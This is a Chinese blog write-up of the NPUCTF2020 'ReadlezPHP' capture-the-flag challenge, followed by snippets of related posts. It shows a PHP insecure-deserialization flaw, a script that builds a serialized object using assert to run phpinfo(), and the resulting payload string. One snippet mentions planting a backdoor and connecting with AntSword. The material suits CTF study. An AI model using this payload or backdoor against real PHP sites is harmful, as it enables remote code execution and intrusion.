[NPUCTF2020]ReadlezPHP 1

最新推荐文章于 2024-08-07 20:16:15 发布
最新推荐文章于 2024-08-07 20:16:15 发布
阅读量680 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/124207488
版权

web安全

[NPUCTF2020]ReadlezPHP 1

首先打开题目,通过查看源码发现:

在这里插入图片描述
发现time.php页面访问得到:

在这里插入图片描述
请求source看看得到:

在这里插入图片描述
得到源码:

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

很简单的一个反序列化,传入两个值b做函数,a做命令

<?php
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "phpinfo()";
        $this->b = "assert";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        $b($a);
    }
} 

$c =new HelloPhp; 


echo serialize($c);
?>

得到:

O:8:“HelloPhp”:2:{s:1:“a”;s:9:“phpinfo()”;s:1:“b”;s:6:“assert”;}

请求得到:

在这里插入图片描述
查看信息发现flag:

在这里插入图片描述

南冥~
关注
[NPUCTF2020]ReadlezPHP
missht0的博客
01-30 292
[NPUCTF2020]ReadlezPHP 在源码里面搜索php,搜到一个 访问后是源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __de
[NPUCTF2020]ReadlezPHP 1[b(a)]
weixin_45577185的博客
10-16 163
f12发现了令一个网页,打开 发现代码,开始审计 __destruct()魔术方法: 属性b包裹住属性a 利用assert()函数 assert 判断一个表达式是否成立 assert()可以将整个字符串参数当作php参数执行。 构造反序列化 由b(a)可以构造b=assert,a=phpinfo ->assert(phpinfo()) 反序列化构造 payload:?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert"
[NPUCTF2020]ReadlezPHP1
最新发布
kw741951的博客
08-07 232
此处未想到flag在phpinfo文件中,在网上才发现flag在phpinfo文件,因此构造序列化信息:O:8:"HelloPhp":2:{s:1:"a";ctrl+u查看源代码。看到php代码,打开。
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 3086
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
[NPUCTF2020]Classical Cipher
2er0!=O的博客
07-23 1187
[NPUCTF2020]Classical Cipher 附件: key.txt: 解密后的flag请用flag{}包裹 压缩包密码:gsv_pvb_rh_zgyzhs 对应明文: ***_key_**_****** 词频分析 得到压缩包密码: 第一个尝试无果,发现第二个才是正确的密码: the_key_is_atbash 猪圈加动物???? 解密得到flag: classicalcode 根据题目要求套上flag提交即可! ...
反序列化&动态调用 [NPUCTF2020]ReadlezPHP1
m0_75178803的博客
03-28 1053
在源代码上看到提示访问一下看看代码审计一下和执行漏洞:echo $b($a);在__destruct()方法里面有 echo $b($a);这个是php的特性,php可以通过这种方法动态调用方法我们可以利用这个特性弄一个后门代码如下成功蚁剑连接一下但是进去却什么都没有那我们修改代码,改去访问phpinfo成功访问。
反序列化 [NPUCTF2020]ReadlezPHP1
m0_75178803的博客
02-23 660
现存在反序列化语句:@$ppp = unserialize($_GET["data"]);和执行漏洞:echo $b($a);发现成功了,于是可以用蚁剑连接,但是这个题目用蚁剑连接以后是空白一片,于是考虑可能是在phpinfo()里面。思路很简单,只要把$b赋值为方法名字,吧$a赋值成调用的参数就行了。发现在__destruct()方法里面有 echo $b($a);这个是php的特性,php可以通过这种方法动态调用方法。打开源代码发现了个./time.php?将得到的payload上传。
[NPUCTF2020]ReadlezPHP -wp
freerats的博客
08-14 614
查看一下源码(可以f12,也可以在页面边缘右键) 发现源代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){
BUUCTF WEB readlezphp1
qq_41696858的博客
12-31 520
打开场景,一个窟窿头,太哈人了,源码审计吧 发现一个奇怪的a标签,time.php?source 访问一下,果然是源码审计 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } pu
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值